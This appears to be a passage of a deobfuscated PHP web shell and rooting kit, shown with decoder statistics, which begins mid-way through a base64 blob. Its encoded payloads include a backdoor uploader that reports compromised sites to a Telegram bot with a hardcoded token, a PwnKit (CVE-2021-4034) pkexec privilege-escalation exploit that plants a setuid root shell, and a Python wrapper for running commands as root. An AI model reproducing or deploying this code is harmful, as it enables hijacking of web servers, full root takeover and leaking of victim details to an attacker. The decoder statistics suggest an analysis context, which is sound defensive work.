9nSUNBZ0lDQWdJQ0FnSUNCcFppaEFZMjl3ZVNna1gwWkpURVZUV3lkcFpIaGZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRMQ0FrWm1sc1pYTXBLU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JsWTJodklDSnpkV3R6WlhNZ2RYQnNiMkZrSUR4aVBpUm1hV3hsY3p3dllqNGdaR2tnWm05c1pHVnlJR2x1YVNJN0NpQWdJQ0FnSUNBZ0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxZMmh2SUNKbllXZGhiQ0IxY0d4dllXUWlPd29nSUNBZ0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ2ZRb2dJQ0FnZlFwOUlHVnNjMlZwWmlocGMzTmxkQ2drWDBkRlZGc2lTMmx5YVhOaGEya2lYU2twZXdvSkpHaHZiV1ZsSUQwZ0pGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFRzS0NTUmpaMlp6SUQwZ1pYaHdiRzlrWlNnaUx5SXNKR2h2YldWbEtUc0tDU1JpZFdsc1pDQTlJQ2N2Snk0a1kyZG1jMXN4WFM0bkx5Y3VKR05uWm5OYk1sMHVKeTh1WTJGblpXWnpKenNLQ1dsbUtHbHpYMlJwY2lna1luVnBiR1FwS1NCN0Nna0paV05vYnlnaVEyeHZkV1JNYVc1MWVDQTlQaUJVY25WbElpazdDZ2w5SUdWc2MyVWdld29KQ1dWamFHOG9Ja05zYjNWa1RHbHVkWGdnUFQ0Z1JtRnNjMlVpS1RzS0NYMEtmV1ZzYzJVZ2V3b2dJQ0FnYUdWaFpHVnlLQ2RJVkZSUUx6RXVNU0EwTURNZ1JtOXlZbWxrWkdWdUp5azdDbjBLUHo0PSI7CiRvcGVuID0gZm9wZW4oJG5hbWEsICd3Jyk7CmZ3cml0ZSgkb3BlbiwgYmFzZTY0X2RlY29kZSgkZmlsZXMpKTsKZmNsb3NlKCRvcGVuKTsKaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7CiAgICAgICAgJHN5cyA9IHBocF91bmFtZSgpOyAKICAgICAgICAkbGloYXQgPSBnZXRjd2QoKTsKICAgICAgICAkZG9tZW4gPSAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsKICAgICAgICAkdGVtcGF0ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiAgICAgICAgJGRhdGEgPSBbCiAgICAgICAgICAgICAgICAnY2hhdF9pZCcgPT4gJzEzMzAzNzc5MzAnLAogICAgICAgICAgICAgICAgJ3RleHQnID0+ICIgJGRvbWVuJHRlbXBhdCBcclxuIEJhY2tkb29yIC0+ICRuYW1hP0NoaXRvZ2VcclxuICRzeXMgXHJcbiIgXTsKICAgICAgICAkcmVzcG9uc2UgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDY1Mjg2OTE2Mzc6QUFHTTgtSXc0cXRVY3g5aVFoUEhUSFpEc09DZ21YTDdLemcvc2VuZE1lc3NhZ2U/IiAuIGh0dHBfYnVpbGRfcXVlcnkoJGRhdGEpICk7Cn1lbHNlewogICAgICAgICRwID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107CiAgICAgICAgJHAgLj0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiAgICAgICAgJGRhdGEgPSBbCiAgICAgICAgICAgICAgICAnY2hhdF9pZCcgPT4gJzEzMzAzNzc5MzAnLAogICAgICAgICAgICAgICAgJ3RleHQnID0+ICIgJHAgIiBdOwogICAgICAgICRyZXNwb25zZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL2FwaS50ZWxlZ3JhbS5vcmcvYm90NjUyODY5MTYzNzpBQUdNOC1JdzRxdFVjeDlpUWhQSFRIWkRzT0NnbVhMN0t6Zy9zZW5kTWVzc2FnZT8iIC4gaHR0cF9idWlsZF9xdWVyeSgkZGF0YSkgKTsKCn0="; goto S6XtV; flGGY: function yuuki_rootc() { $privesc = "LyoKICogUHJvb2Ygb2YgQ29uY2VwdCBmb3IgUHduS2l0OiBMb2NhbCBQcml2aWxlZ2UgRXNjYWxhdGlvbiBWdWxuZXJhYmlsaXR5IERpc2NvdmVyZWQgaW4gcG9sa2l04oCZcyBwa2V4ZWMgKENWRS0yMDIxLTQwMzQpIGJ5IEFuZHJpcyBSYXVndWxpcyA8bW9vQGFydGhlcHN5LmV1PgogKiBBZHZpc29yeTogaHR0cHM6Ly9ibG9nLnF1YWx5cy5jb20vdnVsbmVyYWJpbGl0aWVzLXRocmVhdC1yZXNlYXJjaC8yMDIyLzAxLzI1L3B3bmtpdC1sb2NhbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi12dWxuZXJhYmlsaXR5LWRpc2NvdmVyZWQtaW4tcG9sa2l0cy1wa2V4ZWMtY3ZlLTIwMjEtNDAzNAogKi8KI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKY2hhciAqc2hlbGwgPSAKCSIjaW5jbHVkZSA8c3RkaW8uaD5cbiIKCSIjaW5jbHVkZSA8c3RkbGliLmg+XG4iCgkiI2luY2x1ZGUgPHVuaXN0ZC5oPlxuXG4iCgkidm9pZCBnY29udigpIHt9XG4iCgkidm9pZCBnY29udl9pbml0KCkge1xuIgoJIglzZXR1aWQoMCk7IHNldGdpZCgwKTtcbiIKCSIJc2V0ZXVpZCgwKTsgc2V0ZWdpZCgwKTtcbiIKCSIJc3lzdGVtKFwiZXhwb3J0IFBBVEg9L3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovc2JpbjovYmluOyBybSAtcmYgJ0dDT05WX1BBVEg9LicgJ3B3bmtpdCc7IGNob3duIHJvb3Q6cm9vdCB5dXVraTsgY2htb2QgNDc3NyB5dXVraTsgL2Jpbi9zaFwiKTtcbiIKCSIJZXhpdCgwKTtcbiIKCSJ9IjsKCmNoYXIgKmdldHJvb3QgPSAKCSIjaW5jbHVkZSA8dW5pc3RkLmg+XG4iCgkiI2luY2x1ZGUgPHN0ZGlvLmg+XG4iCgkiaW50IG1haW4gKHZvaWQpXG4iCgkie1xuIgoJIglzZXRnaWQoMCk7XG4iCgkiCXNldHVpZCgwKTtcbiIKCSIJc3lzdGVtKFwiL2Jpbi9iYXNoXCIpO1xuIgoJIglyZXR1cm4gMDtcbiIKCSJ9IjsKCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsKCUZJTEUgKmZwOwoJRklMRSAqZ3I7CglzeXN0ZW0oIm1rZGlyIC1wICdHQ09OVl9QQVRIPS4nOyB0b3VjaCAnR0NPTlZfUEFUSD0uL3B3bmtpdCc7IGNobW9kIGEreCAnR0NPTlZfUEFUSD0uL3B3bmtpdCciKTsKCXN5c3RlbSgibWtkaXIgLXAgcHdua2l0OyBlY2hvICdtb2R1bGUgVVRGLTgvLyBQV05LSVQvLyBwd25raXQgMicgPiBwd25raXQvZ2NvbnYtbW9kdWxlcyIpOwoJZnAgPSBmb3BlbigicHdua2l0L3B3bmtpdC5jIiwgInciKTsKCWZwcmludGYoZnAsICIlcyIsIHNoZWxsKTsKCWZjbG9zZShmcCk7CgoJZ3IgPSBmb3BlbigiZ2V0cm9vdC5jIiwgInciKTsKCWZwcmludGYoZ3IsICIlcyIsIGdldHJvb3QpOwoJZmNsb3NlKGdyKTsKCglzeXN0ZW0oImdjYyBnZXRyb290LmMgLW8geXV1a2kiKTsKCglzeXN0ZW0oImdjYyBwd25raXQvcHdua2l0LmMgLW8gcHdua2l0L3B3bmtpdC5zbyAtc2hhcmVkIC1mUElDIik7CgljaGFyICplbnZbXSA9IHsgInB3bmtpdCIsICJQQVRIPUdDT05WX1BBVEg9LiIsICJDSEFSU0VUPVBXTktJVCIsICJTSEVMTD1wd25raXQiLCBOVUxMIH07CglleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIChjaGFyKltdKXtOVUxMfSwgZW52KTsKfQ=="; $fp = file_put_contents("prvesc.c", base64_decode($privesc)); return True; } goto O5AUA; O_197: echo "UID/GID: {$user} ( {$uid} ) | {$group} ( {$gid} )<br>"; goto M2oxq; g_Otp: $kernel = php_uname(); goto eBFAC; M2oxq: echo "SYSTEM_FUNCTION: {$check_system} | GCC: {$gcc} | PYTHON: {$python} | PKEXEC: {$pkexec}</br>"; goto S5AjL; KodFN: $check_system = function_exists("system") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto sFw1U; bN1bX: @ini_set("output_buffering", 0); goto tZdjz; tZdjz: @ini_set("display_errors", 0); goto C39Og; C39Og: set_time_limit(0); goto vLgiU; sFw1U: $python = exe("python --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto iT3MM; S5AjL: echo "<br><br>make sure system_function, gcc, python, pkexec all enabled<br>"; goto Q3Gd3; Q3Gd3: ?>
<form action=""method="POST"><input name="gass"type="submit"value="touch me senpai!!!"></form><?php goto z2Ez2; O5AUA: function rootshell_py() { $rootshell = "IyEvYmluL3B5dGhvbgojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLQpmcm9tICAgIHN1YnByb2Nlc3MgaW1wb3J0IFBvcGVuLCBQSVBFLCBTVERPVVQKaW1wb3J0ICB0aW1lCmltcG9ydCAgb3MKaW1wb3J0ICBzeXMKIApleHBsb2l0ID0gJy4veXV1a2knCmNtZHMgICAgPSBzeXMuYXJndlsxXQogCnAgPSBQb3BlbihbZXhwbG9pdCwgJyddLCBzdGRvdXQ9UElQRSwgc3RkaW49UElQRSwgc3RkZXJyPVNURE9VVCkKcHJpbnQoc3RyKHAuY29tbXVuaWNhdGUoY21kcylbMF0pKQ=="; $fp = fopen("rootshell.py", "w"); fwrite($fp, base64_decode($rootshell)); fclose($fp); return True; } goto wRYxw; iT3MM: $gcc = exe("gcc --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto PN9Or; BYIW8: ?>
<!doctypehtml><html><head><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"type="text/javascript"></script></head></html><?php goto bN1bX; vLgiU: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } } goto KodFN; O6vZ0: ?>Function Calls
| None |
Stats
| MD5 | 5ae6ff554d75ef36132d007bfce1efdf |
| Eval Count | 0 |
| Decode Time | 473 ms |